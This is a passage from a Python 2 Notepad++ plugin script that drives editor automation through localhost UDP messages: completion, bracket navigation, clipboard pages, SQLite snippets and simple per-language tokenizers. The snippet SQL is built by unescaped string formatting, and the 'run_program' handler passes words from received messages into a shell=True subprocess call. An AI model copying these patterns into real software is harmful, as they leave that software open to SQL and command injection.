z = get_closest_match(m,bl); if(z in al): z = bm[buff_id][c_lang]["alias"][mt][z]; tf = mem_re.search(result); result = "%s%s%s" % (result[0:tf.start()],z,result[tf.end():]); del al; del bl; else: result = get_closest_match(msg,bm[buff_id][c_lang][memtype[0]]); """ ts = t.split("|"); result = ""; if(len(ts) > 2): m = ts[1]; z = get_closest_match(m,bm[buff_id][atom_list[memtype]]); result = "%s%s%s" % (ts[0],z,ts[2]); #print "TESTING: ", result,"\n\n"; pre = ""; else: result = get_closest_match(msg,bm[buff_id][atom_list[memtype]]); """ #result = get_closest_match(msg,bm[buff_id][atom_list[memtype]]); #if((memtype == 0) and (pre == "$")): # result = "%s%s" % (pre,result); ed.addText(result); except: pass; elif(mtype == "run_program"): try: nosave = False; fn = serv_path + "\\run_code.bat"; cfn = Notepad.getCurrentFilename(notepad); plist = ["start", fn]; msg = msg.replace(":filename",cfn); if(msg.find(":nosave") != -1): nosave = True; msg = msg.replace(":nosave",""); if(not nosave): Notepad.menuCommand(notepad,41006); ms = msg.split(" "); for m in ms: if((m == None) or (m == "")): continue; plist.append(m); subprocess.Popen(plist, shell = True) except: pass; elif(mtype == "auto_language_detect"): try: res = -1; t = int(msg); #print "Auto lang: "+str(t); if(t == 1): res = t; auto_lang = True; elif(t == 0): rest = t auto_lang = False; if(t != -1): try: with open(serv_path+"\\grammar\\autolang.txt","w+") as f: f.write(str(res)); f.flush(); except: pass; except: pass; elif(mtype == "grammar_def"): #print "testing\n"; #tfn = serv_path+"\\__code_utility__"; tfn = serv_path+"\\grammar\\grammar.ini" #print tfn; fl = Notepad.getFiles(notepad); efl = []; efd = {}; for f in fl: efl.append(f[0]); efd[f[0]] = f[1]; if(tfn in efl): Notepad.activateBufferID(notepad,efd[tfn]); Notepad.close(notepad); time.sleep(0.1); else: cbid = Notepad.getCurrentBufferID(notepad); Notepad.open(notepad,tfn); Notepad.menuCommand(notepad,10001); Notepad.activateBufferID(notepad,cbid); elif(mtype == "container_navigation"): #print "testing\n"; #tfn = serv_path+"\\__code_utility__"; dir = 0; x = 1; cntype = 0; tf = msg.find(":right"); if(tf != -1): dir = 1; ts = msg.split(" "); #Console.write(console,"msg: "+str(msg)+"\n\n"); try: tstype = int(ts[len(ts)-2]); cntype = tstype; except: pass; #Console.write(console,"cntype: "+str(cntype)+" : "+str(ts)+"\n\n"); tf = msg.find(":paren"); if(tf != -1): if(dir == 0): paren_nav_left(x,cntype); else: paren_nav_right(x,cntype); continue; tf = msg.find(":square"); if(tf != -1): if(dir == 0): square_nav_left(x,cntype); else: square_nav_right(x,cntype); continue; tf = msg.find(":curly"); tf2 = msg.find(":bracket"); if((tf != -1)or(tf2 != -1)): if(dir == 0): curly_nav_left(x,cntype); else: curly_nav_right(x,cntype); continue; tf = msg.find(":angle"); if(tf != -1): if(dir == 0): angle_nav_left(x,cntype); else: angle_nav_right(x,cntype); continue; elif(mtype == "container_navigation_short"): #print "testing\n"; #tfn = serv_path+"\\__code_utility__"; st = "paren"; if ("subtype" in props): st = props["subtype"]; dir = 0; if ("direction" in props): try: nn = int(props["direction"]); dir = nn; except: pass; x = 1; cntype = 0; xl = connav_re.findall(msg); for y in xl: try: nn = int(y[3:]); x = nn; except: pass; break; ts = msg.split(" "); #Console.write(console,"ts: "+str(ts)+"\n\n"); try: tstype = int(ts[len(ts)-2]); cntype = tstype; except: try: tstype = int(ts[len(ts)-1]); cntype = tstype; except: pass; #Console.write(console,"msg: "+msg+" cntype: "+str(cntype)+" : "+str(st)+" x:"+str(x)+"\n\n"); if(st == "paren"): if(dir == 0): paren_nav_left(x,cntype); else: paren_nav_right(x,cntype); continue; if(st == "square"): if(dir == 0): square_nav_left(x,cntype); else: square_nav_right(x,cntype); continue; if(st == "curly"): if(dir == 0): curly_nav_left(x,cntype); else: curly_nav_right(x,cntype); continue; if(st == "angle"): if(dir == 0): angle_nav_left(x,cntype); else: angle_nav_right(x,cntype); continue; elif(mtype == "clipboard_page_manage"): #print "testing\n"; #tfn = serv_path+"\\__code_utility__"; #tfn = serv_path+"\\clipboard\\clipboard_page.ini" #print tfn; fn = Notepad.getCurrentFilename(notepad); tfn = ""; ms = msg.replace("\r","").replace("\n","").split(" "); try: m = ms[len(ms)-1]; if(m == ""): m = ms[len(ms)-2]; if((m[0] == ":") or (m == "")): continue; tfn = m; except: pass; tf = msg.find(":add"); if(tf != -1): try: kl = []; for k in cb_page_bmap.iterkeys(): kl.append(k); res = get_closest_match(tfn,kl); if(res != None): mstr = jellyfish.jaro_distance(tfn,res); if(mstr >= 0.7): Console.write(console,"Clipboard-Page NOT ADDED: "+tfn+" Match strength ["+str(mstr)+"] too strong to existing page: "+res+"\n"); continue; tdir = get_dirname(fn); if(tdir == ""): Console.write(console,"Clipboard-Page NOT ADDED. No directory??? -- "+fn+":"+tdir+"\n"); continue; tdf = None; for k,v in cb_page_bmap.iteritems(): if(v[2] == tdir): tdf = k; break; if(tdf != None): Console.write(console,"Clipboard-Page ["+str(tfn)+"] NOT ADDED. Directory already has a page: -- "+k+":"+tdir+"\n"); continue; # Issue add command to the database via the client script. sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":add",str(tfn),":dir",str(tdir)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: sr = sub.communicate()[0]; if(sr.replace("\n","").replace("\r","") != "Done."): Console.write(console,"Clipboard-Page NOT ADDED: -- CB_CLIENT.PY SCRIPT ERROR --\n"+sr); continue; except: Console.write(console,"Clipboard-Page NOT ADDED: == CB_CLIENT.PY SCRIPT ERROR =="); continue; Console.write(console,"Clipboard-Page Added: "+tfn+"\n"); cb_page = tfn; cb_page_bmap[tfn] = [None,icb_max,tdir,1]; cb_page_map[tfn] = [""] * icb_max; m = cb_page_bmap[tfn]; internal_cb = cb_page_map[m[0]]; cb_page = m[0]; cb_buff = m[3] - 1; clipboard_list(cb_list_flag,1); clipboard_page_list(1,1); except: pass; tf = msg.find(":delete"); if(tf != -1): try: kl = []; for k in cb_page_bmap.iterkeys(): kl.append(k); res = get_closest_match(tfn,kl); if((res == None) or (res == "default")): Console.write(console,"No match.\n"); continue; Console.write(console,"Clipboard-Page Deleted: "+res+"\n"); if(cb_page == res): m = cb_page_bmap[cb_page_default]; internal_cb = cb_page_map[m[0]]; cb_page = m[0]; cb_buff = m[3] - 1; m = cb_page_bmap[res]; # Delete local data for the page. cb_page_bmap.pop(res); cb_page_map.pop(res); # Issue delete command to the database via the client script. sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":delete",str(res)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"Raw: "+str(raw)+"\n"); except: pass; clipboard_list(cb_list_flag,1); clipboard_page_list(1,1); except: pass; tf = msg.find(":goto"); if(tf != -1): try: kl = []; for k in cb_page_bmap.iterkeys(): kl.append(k); res = get_closest_match(tfn,kl); if(res == None): Console.write(console,"No match."); continue; Console.write(console,"Clipboard-Page Selected: "+res+"\n"); m = cb_page_bmap[res]; internal_cb = cb_page_map[res]; cb_page = res; cb_buff = m[3] - 1; clipboard_list(cb_list_flag,1); clipboard_page_list(1,1); except: pass; elif(mtype == "add_snippet"): selection_start = ed.getSelectionStart(); selection_end = ed.getSelectionEnd(); if(selection_start == selection_end): continue; # makes no sense to add an empty snippet. txt = Editor.getTextRange(editor, selection_start, selection_end); txt = txt.replace("'","''"); snippet_db_path = "%s\\snippets\\db\\snippets.sqlite3" % serv_path; connection = sqlite3.connect(snippet_db_path); cursor = connection.cursor(); snippet_context = current_lang; msg_split = msg.split("~~~"); snippet_name = msg_split[0].replace("_"," ").replace("/","").replace("\\","").replace(":",""); has_snippet_context = (len(msg_split) > 1) and (msg_split[1].replace(" ","").replace("\t","").replace("\n","") != ""); possible_context_list = ["wildcard"]; for context in dm.iterkeys(): possible_context_list.append(context); if(has_snippet_context): snippet_context = msg_split[1]; # match it to one of the context options. closest_context = get_closest_match(snippet_context, possible_context_list); # ensure this snippet name isn't taken for this context sql = "select name from snippet where (context = '%s' or '%s' = 'wildcard') and name = '%s'" % (snippet_context, snippet_context, snippet_name); cursor.execute(sql); rows = cursor.fetchall(); snippet_names = [] for fetched_snippet_name in rows: if((fetched_snippet_name[0] != None) and (fetched_snippet_name[0] != "")): snippet_names.append(fetched_snippet_name[0].lower()); if(len(snippet_names) > 0): continue; # insert the snippet. sql = "insert into snippet (name, content, context) values ('%s', '%s', '%s')" % (snippet_name, txt, snippet_context); cursor.execute(sql); connection.commit(); connection.close(); Console.write(console,"ADD-SNIPPET: %s\n" % snippet_name); elif(mtype == "inject_snippet"): selection_start = ed.getSelectionStart(); selection_end = ed.getSelectionEnd(); if(selection_start != selection_end): ed.deleteBack(); snippet_db_path = "%s\\snippets\\db\\snippets.sqlite3" % serv_path; connection = sqlite3.connect(snippet_db_path); cursor = connection.cursor(); msg_split = msg.split("~~~"); snippet_name = msg_split[0].replace("_"," ").replace("/","").replace("\\","").replace(":",""); snippet_context = current_lang; has_snippet_context = (len(msg_split) > 1) and (msg_split[1].replace(" ","").replace("\t","").replace("\n","") != ""); possible_context_list = ["wildcard"]; for context in dm.iterkeys(): possible_context_list.append(context); if(has_snippet_context): snippet_context = msg_split[1]; # match it to one of the context options. closest_context = get_closest_match(snippet_context, possible_context_list); if(snippet_context == None): snippet_context = current_lang; sql = "select name from snippet where (context = '%s' or '%s' = 'wildcard')" % (snippet_context, snippet_context); cursor.execute(sql); rows = cursor.fetchall(); snippet_names = []; for fetched_snippet_name in rows: if((fetched_snippet_name[0] != None) and (fetched_snippet_name[0] != "")): snippet_names.append(str(fetched_snippet_name[0]).lower()); snippet_name = get_closest_match(snippet_name, snippet_names); if((snippet_name == None) or (snippet_name == "")): continue; sql = "select content from snippet where (context = '%s' or '%s' = 'wildcard') and name = '%s' limit 1" % (snippet_context, snippet_context, snippet_name); cursor.execute(sql); snippet = ""; try: snippet = cursor.fetchone()[0]; except: continue; connection.close(); Console.write(console,"INJECT-SNIPPET: %s\n" % snippet_name); if(snippet == None): continue; cln = cur_line_num(ed); lines = snippet.replace("\r","").split("\n"); prep = ""; tc = int(ed.getLineIndentation(cln)/4); m = ""; tabs = "\t" * tc sep = "\n%s" % tabs for x in lines: m += prep + x; prep = sep; snippet = m; ed.addText(snippet); elif(mtype == "display_snippets"): snippet_db_path = "%s\\snippets\\db\\snippets.sqlite3" % serv_path; connection = sqlite3.connect(snippet_db_path); cursor = connection.cursor(); snippet_context = current_lang; has_snippet_context = msg.replace(" ","").replace("\t","").replace("\n","") != ""; possible_context_list = ["wildcard"]; for context in dm.iterkeys(): possible_context_list.append(context); if(has_snippet_context): snippet_context = msg; # match it to one of the context options. closest_context = get_closest_match(snippet_context, possible_context_list); if(snippet_context == None): snippet_context = current_lang; sql = "select name from snippet where (context = '%s' or '%s' = 'wildcard')" % (snippet_context, snippet_context); cursor.execute(sql); rows = cursor.fetchall(); snippet_names = []; for fetched_snippet_name in rows: if((fetched_snippet_name[0] != None) and (fetched_snippet_name[0] != "")): snippet_names.append(str(fetched_snippet_name[0]).lower()); snippet_names.sort(); Console.write(console,"DISPLAY-SNIPPETS: %s\n" % snippet_context); snippet_display_string = "\n".join(snippet_names); snippet_display_name_list(snippet_display_string); connection.close(); """ # Roll out a subprocess for the client process. sub = subprocess.Popen(["python","-u","E:\\usr\\nppserve\\npp_client_ka.py"],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); while(is_running): time.sleep(0.05); #print "Awaiting input..."; raw = sub.stdout.readline(); #print "\n---------\n\ninput read: "+str(raw)+"\n\n"; is_valid, data = cleaner(raw); #print str(data); if(not is_valid): tmp += raw; is_valid, data = cleaner(tmp); if(not is_valid): continue; tmp = ""; msg, props = format_msg(data); cln = cur_line_num(ed); if(("type" not in props) or (props["type"] == "add_text")): indent = "inherit"; if("indent" in props): indent = props["indent"]; lines = msg.replace("\r","").split("\n"); prep = ""; tc = int(ed.getLineIndentation(cln)/4); m = ""; for x in lines: m += prep + x; prep = "\n" + ("\t" * tc); ed.addText(m); elif("type" in props): mtype = props["type"]; if(mtype == "action"): m = msg.split(":"); an = m[0]; rp = 1; if(len(m) > 1): try: rp = int(m[1]); except: rp = 1; if(an in action_map): action_map[an](rp); else: pass; """ #print "Exited loop...\n"; def paste_server(): global end_proc; global paste_port; global paste_send_port; global end_msg; global dsep; global msg_queue; global ksep; send_port = paste_send_port; UDP_IP = "127.0.0.1" UDP_PORT = paste_port; r_addr = ""; r_port = 0; sock = socket.socket(socket.AF_INET, # Internet socket.SOCK_DGRAM) # UDP sock.bind((UDP_IP, UDP_PORT)) while True: data, addr = sock.recvfrom(1024) # buffer size is 1024 bytes r_addr = addr[0]; r_port = addr[1]; #if(end_proc): # break; #if(data == end_msg): # break; send_msg("ack",send_port); #conn = sqlite3.connect("db\\npp_serve.sqlite3"); #cur = conn.cursor(); d_raw = data.split(dsep); dat = d_raw[0]; props = ""; if(len(d_raw) > 1): props = d_raw[1]; #msg_queue.append([dat,props,0]); try: msg_queue.append([dat,format_props(props),0]); except: pass; #sql = "insert into npp_cmd (data,props,mtype,client_port,client_ip) values (?,?,?,?,?)"; #prep = [dat,props,0,str(r_port),str(r_addr)]; #cur.execute(sql,prep); #conn.commit(); #try: # conn.close(); #except: # pass; #sys.stdout.write("PASTE received message:", data, " : ", addr[0], ":",addr[1]) #sys.stdout.flush() #print "PASTE received message:", data, " : ", addr[0], ":",addr[1] def cmd_server(): global end_proc; global cmd_port; global cmd_send_port; global end_msg; global dsep; global ksep; send_port = cmd_send_port; UDP_IP = "127.0.0.1" UDP_PORT = cmd_port; r_addr = ""; r_port = 0; sock = socket.socket(socket.AF_INET, # Internet socket.SOCK_DGRAM) # UDP sock.bind((UDP_IP, UDP_PORT)) while True: data, addr = sock.recvfrom(1024) # buffer size is 1024 bytes r_addr = addr[0]; r_port = addr[1]; #if(end_proc): # break; #if(data == end_msg): # break; send_msg("ack",send_port); #conn = sqlite3.connect("db\\npp_serve.sqlite3"); #cur = conn.cursor(); d_raw = data.split(dsep); dat = d_raw[0]; props = ""; if(len(d_raw) > 1): props = d_raw[1]; try: msg_queue.append([dat,format_props(props),1]); except: pass; #sql = "insert into npp_cmd (data,props,mtype,client_port,client_ip) values (?,?,?,?,?)"; #prep = [dat,props,1,str(r_port),str(r_addr)]; #cur.execute(sql,prep); #conn.commit(); #try: # conn.close(); #except: # pass; #print "CMD received message:", data, " : ", addr[0], ":",addr[1] def send_msg(msg,port): UDP_IP = "127.0.0.1" UDP_PORT = port MESSAGE = msg; sock = socket.socket(socket.AF_INET, # Internet socket.SOCK_DGRAM) # UDP sock.sendto(MESSAGE, (UDP_IP, UDP_PORT)) def check_eligible_word(w): if(len(w) < 1): return False; """ if(len(w) < 2): return False; """ try: v = int(w); if(str(v) == w): return False; except: pass; return True; def string_remover(txt,rr): tmp = txt; tmp2 = ""; for x in rr: r = x[0]; g = r.search(tmp); if(g == None): continue; os = -1; oe = -1; ns = 0; try: ns = g.start(); ne = g.end(); tmp2 = tmp[0:ns]; #print tmp[ns:ne]; except: pass; while((g != None) and (os != ns)): os = ns; oe = ne; g = r.search(tmp,ne + 1); if(g == None): break; try: ns = g.start(); ne = g.end(); tmp2 = "%s%s" % (tmp2,tmp[oe:ns]); #print tmp[ns:ne]; #print " ***>>>" except: pass; tmp2 = "%s%s" % (tmp2,tmp[oe:]); tmp = tmp2; return tmp; bm = {}; atom_list = ["var","function","class","token"]; atom_map = {}; lang_list = ["py","php"]; # 'r' | 'u' | 'ur' | 'R' | 'U' | 'UR' | 'Ur' | 'uR' sr = [['[uUrR]*"""[^"\\\\]*(?:(?:\\\\.|"{1,2}(?!"))[^"\\\\]*)*"""','[uUrR]*"""','"""'], ["[uUrR]*'''[^'\\\\]*(?:(?:\\\\.|'{1,2}(?!'))[^'\\\\]*)*'''","[uUrR]*'''","'''"], ['[uUrR]*"([^"\\\\]*(?:\\\\.[^"\\\\]*)*)"','[uUrR]*"','"'], ["[uUrR]*'([^'\\\\]*(?:\\\\.[^'\\\\]*)*)'","[uUrR]*'","'"]]; ssr = r"""#[.]*"""; py_rr = []; for x in sr: py_rr.append([re.compile(x[0]),re.compile(x[1]),re.compile(x[2])]); py_rr.append([re.compile(ssr,re.VERBOSE),re.compile(ssr,re.VERBOSE),re.compile(r"""[^.]""",re.VERBOSE)]); reg_rr = {}; reg_rr["python"] = py_rr; atom_map["py"] = ["var","function","class","token"]; def parse_py(txt,buff_id): global py_rr; global atom_list; global atom_map; global bm; lang = "py"; if(lang not in bm[buff_id]): bm[buff_id][lang] = {}; bm[buff_id][lang]["alias"] = {} kw = ['and', 'as', 'assert', 'break', 'class', 'continue', 'def', 'del', 'elif', 'else', 'except', 'exec', 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is', 'lambda', 'not', 'or', 'pass', 'print', 'raise', 'return', 'try', 'while', 'with', 'yield']; c = "class"; f = "def"; vd = ["None","True","False"]; fd = []; cd = []; tl = []; tmp = string_remover(txt,py_rr); ss = tmp.split("\n"); pt = None; for x in ss: y = re.split("[^a-zA-Z0-9_]{1}",x); t = []; pt = None; for z in y: if z != "": t.append(z); if(pt != None): if((pt == f) and (z not in fd)): fd.append(z); elif((pt == c) and (z not in cd)): cd.append(z); if((z not in tl) and (z not in kw)): tl.append(z); pt = z; for x in tl: if((x not in fd) and (x not in cd) and (x not in vd) and check_eligible_word(x)): vd.append(x); cm = {"var":vd,"function":fd,"class":cd,"token":tl}; if(lang in atom_map): for x in atom_map[lang]: if(x in cm): bm[buff_id][lang][x] = cm[x]; php_sr = [['"([^"\\\\]*(?:\\\\.[^"\\\\]*)*)"','[uUrR]*"','"'], ["'([^'\\\\]*(?:\\\\.[^'\\\\]*)*)'","[uUrR]*'","'"]]; ssr = r"""/ \*(([^*])|(\* [^/]))*\* /"""; ssr2 = r"""//[.]*"""; php_rr = []; for x in php_sr: php_rr.append([re.compile(x[0]),re.compile(x[1]),re.compile(x[2])]); php_rr.append([re.compile(ssr,re.VERBOSE),re.compile(r"""/ \*""",re.VERBOSE),re.compile(r"""\* /""",re.VERBOSE)]); php_rr.append([re.compile(ssr2,re.VERBOSE),re.compile(ssr2,re.VERBOSE),re.compile(r"""[^.]""",re.VERBOSE)]); reg_rr["php"] = php_rr; atom_map["php"] = ["var","function","class","token"]; def parse_php(txt,buff_id): global php_rr; global atom_list; global atom_map; global bm; lang = "php"; if(lang not in bm[buff_id]): bm[buff_id][lang] = {}; bm[buff_id][lang]["alias"] = {} kw = ['__halt_compiler', 'abstract', 'and', 'array', 'as', 'break', 'callable', 'case', 'catch', 'class', 'clone', 'const', 'continue', 'declare', 'default', 'die', 'do', 'echo', 'else', 'elseif', 'empty', 'enddeclare', 'endfor', 'endforeach', 'endif', 'endswitch', 'endwhile', 'eval', 'exit', 'extends', 'final', 'for', 'foreach', 'function', 'global', 'goto', 'if', 'implements', 'include', 'include_once', 'instanceof', 'insteadof', 'interface', 'isset', 'list', 'namespace', 'new', 'or', 'print', 'private', 'protected', 'public', 'require', 'require_once', 'return', 'static', 'switch', 'throw', 'trait', 'try', 'unset', 'use', 'var', 'while', 'xor']; c = "class"; f = "function"; # 'r' | 'u' | 'ur' | 'R' | 'U' | 'UR' | 'Ur' | 'uR' vd = ["null","true","false"]; fd = []; cd = []; tl = []; tmp = string_remover(txt,php_rr); ss = tmp.split("\n"); pt = None; for x in ss: y = re.split("[^a-zA-Z0-9_]{1}",x); t = []; pt = None; for z in y: if z != "": t.append(z); if(pt != None): if((pt == f) and (z not in fd)): fd.append(z); elif((pt == c) and (z not in cd)): cd.append(z); if((z not in tl) and (z not in kw)): tl.append(z); pt = z; for x in tl: if((x not in fd) and (x not in cd) and (x not in vd) and check_eligible_word(x)): vd.append(x); cm = {"var":vd,"function":fd,"class":cd,"token":tl}; #Console.write(console,"php parse:\n------\n\n"+str(tmp)+"\n\n\n"); if(lang in atom_map): for x in atom_map[lang]: if(x in cm): bm[buff_id][lang][x] = cm[x]; #for x in atom_list: # bm[buff_id][lang][x] = cm[x]; """ print "Vars:\n-------\n","\n".join(vd),"\n\n\nFunctions:\n-------\n","\n".join(fd),"\n\n\nClasses:\n---------\n","\n".join(cd); """ # how many memtypes for html? # 4 # What are they? # 0)tag 1)attr 2)class 3)id id_r = "%s|%s" % ('(id="([^"\\\\]*(?:\\\\.[^"\\\\]*)*)")',"(id='([^'\\\\]*(?:\\\\.[^'\\\\]*)*)')"); name_r = "%s|%s" % ('(name="([^"\\\\]*(?:\\\\.[^"\\\\]*)*)")',"(name='([^'\\\\]*(?:\\\\.[^'\\\\]*)*)')"); class_r = "%s|%s" % ('(class="([^"\\\\]*(?:\\\\.[^"\\\\]*)*)")',"(class='([^'\\\\]*(?:\\\\.[^'\\\\]*)*)')"); html_sr = [ [id_r,'.','.'], [name_r,'.','.'], [class_r,".","."], ]; html_rr = []; for x in html_sr: html_rr.append([re.compile(x[0]),re.compile(x[1]),re.compile(x[2])]); reg_rr["html"] = html_rr; atom_map["html"] = ["tagname","attribute","css_class","id","name"]; def parse_html(txt,buff_id): global html_rr; global atom_list; global atom_map; global bm; lang = "html"; if(lang not in bm[buff_id]): bm[buff_id][lang] = {}; bm[buff_id][lang]["alias"] = {} va = {"anchor":"a","unordered":"ul","ordered":"ol","listitem":"li","image":"img","panel":"div","row":"tr","column":"td","tablerow":"tr"}; vd = ["div","a","li","html","body","head","title","table","tr","td","input","textarea","button","iframe","ul","li","img","meta","script","span","label"]; # tag name fa = {"linkref":"href","reference":"href","relative":"rel","source":"src"}; fd = ["width","height","style","onclick","href","rel","class","id","src","type"]; # attribute cd = []; # css class tl = []; # id nl = []; # name id_r = html_rr[0][0]; name_r = html_rr[1][0]; class_r = html_rr[2][0]; tmp = id_r.search(txt); while(tmp != None): ss = tmp.start(); se = tmp.end(); raw = txt[ss+4:se-1]; if(raw not in tl): tl.append(raw); tmp = id_r.search(txt,se+1); tmp = name_r.search(txt); while(tmp != None): ss = tmp.start(); se = tmp.end(); raw = txt[ss+6:se-1]; if(raw not in nl): nl.append(raw); tmp = name_r.search(txt,se+1); tmp = class_r.search(txt); while(tmp != None): ss = tmp.start(); se = tmp.end(); raw = txt[ss+7:se-1]; y = re.split("[^a-zA-Z0-9_]{1}",raw); for x in y: if((x != "") and (x not in cd)): cd.append(x); tmp = class_r.search(txt,se+1); cm = {"tagname":vd,"attribute":fd,"css_class":cd,"id":tl,"name":nl}; ca = {"tagname":va,"attribute":fa,"css_class":{},"id":{},"name":{}}; #for x in atom_list: # bm[buff_id][lang][x] = cm[x]; # bm[buff_id][lang]["alias"][x] = ca[x]; if(lang in atom_map): for x in atom_map[lang]: if(x in cm): bm[buff_id][lang][x] = cm[x]; bm[buff_id][lang]["alias"][x] = ca[x]; xml_sr = [ [id_r,'.','.'], [name_r,'.','.'], [class_r,".","."], ]; xml_rr = []; for x in xml_sr: xml_rr.append([re.compile(x[0]),re.compile(x[1]),re.compile(x[2])]); reg_rr["xml"] = xml_rr; atom_map["xml"] = ["tagname","attribute","css_class","id","name"]; def parse_xml(txt,buff_id): global xml_rr; global atom_list; global atom_map; global bm; lang = "xml"; if(lang not in bm[buff_id]): bm[buff_id][lang] = {}; bm[buff_id][lang]["alias"] = {} va = {}; vd = []; # tag name fa = {"linkref":"href","reference":"href","relative":"rel","source":"src"}; fd = ["width","height","style","href","rel","class","id","src","type"]; # attribute cd = []; # css class tl = []; # id nl = []; # name id_r = html_rr[0][0]; name_r = html_rr[1][0]; class_r = html_rr[2][0]; tmp = id_r.search(txt); while(tmp != None): ss = tmp.start(); se = tmp.end(); raw = txt[ss+4:se-1]; if(raw not in tl): tl.append(raw); tmp = id_r.search(txt,se+1); tmp = name_r.search(txt); while(tmp != None): ss = tmp.start(); se = tmp.end(); raw = txt[ss+6:se-1]; if(raw not in nl): nl.append(raw); tmp = name_r.search(txt,se+1); tmp = class_r.search(txt); while(tmp != None): ss = tmp.start(); se = tmp.end(); raw = txt[ss+7:se-1]; y = re.split("[^a-zA-Z0-9_]{1}",raw); for x in y: if((x != "") and (x not in cd)): cd.append(x); tmp = class_r.search(txt,se+1); try: xml = etree.XML(txt); for c in xml.xpath("//*"): if(c.tag not in vd): vd.append(c.tag); except: pass; cm = {"tagname":vd,"attribute":fd,"css_class":cd,"id":tl,"name":nl}; ca = {"tagname":va,"attribute":fa,"css_class":{},"id":{},"name":{}}; #for x in atom_list: # bm[buff_id][lang][x] = cm[x]; # bm[buff_id][lang]["alias"][x] = ca[x]; if(lang in atom_map): for x in atom_map[lang]: if(x in cm): bm[buff_id][lang][x] = cm[x]; bm[buff_id][lang]["alias"][x] = ca[x]; css_sr = [ ["",'.','.'], ["",".","."], ]; css_rr = []; for x in css_sr: html_rr.append([re.compile(x[0]),re.compile(x[1]),re.compile(x[2])]); reg_rr["css"] = css_rr; atom_map["css"] = ["tagname","property","value","css_class","id","pseudo"]; tcss_parser = tinycss.make_parser("page3"); def parse_css(txt,buff_id): global css_rr; global atom_list; global bm; global tcss_parser; lang = "css"; if(lang not in bm[buff_id]): bm[buff_id][lang] = {}; bm[buff_id][lang]["alias"] = {} ta = {"anchor":"a","unordered":"ul","ordered":"ol","listitem":"li","image":"img","panel":"div","row":"tr","column":"td","tablerow":"tr"}; td = ["div","a","li","html","body","head","title","table","tr","td","input","textarea","button","iframe","ul","li","img","meta","script","span","label"]; # tag name aa = {}; ad = ["width","height","min-width","min-height","float","clear","position","background","background-color","background-repeat","background-position","border","border-top","border-right","border-bottom","border-left","margin","margin-top","margin-right","margin-bottom","margin-left","padding","padding-top","padding-right","padding-bottom","padding-left","line-height","font","font-family","font-style","font-size","font-weight","text-decoration","color","cursor","text-shadow","display","vertical-align","display","list-style-type"]; # style property va = {}; vd = ["Arial", "Helvetica", "sans-serif", "left", "center", "right", "auto", "bold", "none", "no-repeat","repeat-x","repeat-y","repeat","top","url()","solid","!important","block","disc","inline","underline","italic","both","relative","absolute","decimal","pointer"]; # property value cd = []; # css class tl = []; # id pl = ["active","visited","hover","focus","first-letter","first-line","first-child","before","after"]; # pseudo #parse out all the rules, collecting IDs and class names along the way. p = tcss_parser.parse_stylesheet(txt); mod = None; for x in p.rules: for y in x.selector: try: if((y.type.lower() == "ident")and(mod != None)): mod = None; v = y.value; if(mod == 0): if(v not in tl): tl.append(v); elif(mod == 1): if(v not in cd): cd.append(v); elif(y.value == "#"): mod = 0; elif(y.value == "."): mod = 1; else: mod = None; except: pass; cm = {"tagname":td,"property":ad,"value":vd,"css_class":cd,"id":tl,"pseudo":pl}; ca = {"tagname":ta,"property":aa,"value":va,"css_class":{},"id":{},"pseudo":{}}; #for x in atom_list: # bm[buff_id][lang][x] = cm[x]; # bm[buff_id][lang]["alias"][x] = ca[x]; if(lang in atom_map): for x in atom_map[lang]: if(x in cm): bm[buff_id][lang][x] = cm[x]; bm[buff_id][lang]["alias"][x] = ca[x]; js_sr = [['"([^"\\\\]*(?:\\\\.[^"\\\\]*)*)"','',''], ["'([^'\\\\]*(?:\\\\.[^'\\\\]*)*)'","",""]]; ssr = r"""/ \*(([^*])|(\* [^/]))*\* /"""; ssr2 = r"""//[.]*"""; js_rr = []; for x in js_sr: js_rr.append([re.compile(x[0]),re.compile(x[1]),re.compile(x[2])]); js_rr.append([re.compile(ssr,re.VERBOSE),re.compile(r"""/ \*""",re.VERBOSE),re.compile(r"""\* /""",re.VERBOSE)]); js_rr.append([re.compile(ssr2,re.VERBOSE),re.compile(ssr2,re.VERBOSE),re.compile(r"""[^.]""",re.VERBOSE)]); reg_rr["javascript"] = js_rr; atom_map["js"] = ["var","function","class","token"]; def parse_js(txt,buff_id): global js_rr; global atom_list; global atom_map; global bm; lang = "js"; if(lang not in bm[buff_id]): bm[buff_id][lang] = {}; kw = ["break","case","catch","continue","debugger","default","delete","do","else","finally","for","function","if","in","instanceof","new","return","switch","this","throw","try","typeof","var","void","while","with"]; f = "function"; vd = ["null","true","false"]; fd = []; cd = []; tl = []; tmp = string_remover(txt,js_rr); ss = tmp.split("\n"); pt = None; for x in ss: y = re.split("[^a-zA-Z0-9_]{1}",x); t = []; pt = None; for z in y: if z != "": t.append(z); if(pt != None): if((pt == f) and (z not in fd)): fd.append(z); if((z not in tl) and (z not in kw)): tl.append(z); pt = z; for x in tl: if((x not in fd) and (x not in cd) and (x not in vd) and check_eligible_word(x)): vd.append(x); cm = {"var":vd,"function":fd,"class":cd,"token":tl}; #Console.write(console,str(cm)+"\n\n\n~~~~~~\n"+str(buff_id)+"\n~~~~~~\n\n"); if(lang in atom_map): for x in atom_map[lang]: if(x in cm): bm[buff_id][lang][x] = cm[x]; cpp_sr = [['"([^"\\\\]*(?:\\\\.[^"\\\\]*)*)"','[uUrR]*"','"'], ["'([^'\\\\]*(?:\\\\.[^'\\\\]*)*)'","[uUrR]*'","'"]]; ssr = r"""/ \*(([^*])|(\* [^/]))*\* /"""; ssr2 = r"""//[.]*"""; cpp_rr = []; for x in cpp_sr: cpp_rr.append([re.compile(x[0]),re.compile(x[1]),re.compile(x[2])]); cpp_rr.append([re.compile(ssr,re.VERBOSE),re.compile(r"""/ \*""",re.VERBOSE),re.compile(r"""\* /""",re.VERBOSE)]); cpp_rr.append([re.compile(ssr2,re.VERBOSE),re.compile(ssr2,re.VERBOSE),re.compile(r"""[^.]""",re.VERBOSE)]); reg_rr["c"] = php_rr; atom_map["c"] = ["var","function","class","token"]; def parse_cpp(txt,buff_id): global cpp_rr; global atom_list; global atom_map; global bm; lang = "c"; if(lang not in bm[buff_id]): bm[buff_id][lang] = {}; 